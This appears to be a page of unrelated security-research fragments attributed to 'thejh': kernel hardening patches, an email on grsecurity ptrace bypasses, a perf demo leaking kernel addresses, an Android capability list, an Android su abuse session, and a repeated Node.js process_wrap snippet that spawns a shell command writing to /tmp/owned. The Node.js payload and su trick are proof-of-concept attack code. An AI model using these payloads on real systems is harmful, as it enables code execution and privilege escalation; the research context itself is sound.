thejh

$ ./perf_sample_regs_intr_demo 
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5

thejh

init	 root allcaps
ueventd	 root allcaps
logd	 CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd	 CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd	 CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd	 root allcaps
debuggerd64	 root allcaps
vold	 root allcaps
debuggerd64:sig	 root allcaps
debuggerd:sig	 root allcaps

thejh

var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});

thejh

From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl

This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).

thejh

var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});

thejh

Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <[email protected]>
To: Brad Spengler <[email protected]>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses

Hi!

While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.

thejh

From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Sat, 2 Jan 2016 08:09:19 +0100
Subject: [PATCH] fs: allow unprivileged chroot()

Allow unprivileged processes to chroot() themselves, under the
following conditions:

 - The caller must have set NO_NEW_PRIVS to prevent him from
   invoking setuid/setgid/setcap executables in the chroot that

thejh

From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Fri, 14 Aug 2015 17:47:01 +0200
Subject: [PATCH] drivers/tty: require read access for controlling terminal

This is mostly a hardening fix, given that write-only access to other
users' ttys is usually only given through setgid tty executables.

Signed-off-by: Jann Horn <[email protected]>
---

thejh

https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none

thejh

root@android:/ # su 1000
system@android:/ $ cd /tmp
system@android:/tmp $ cat > foo
/system/bin/sh
1
rubbish
system@android:/tmp $ su -c "$(cat foo)"
# press "deny" now with "remember" option activated
Permission denied
1|system@android:/tmp $ su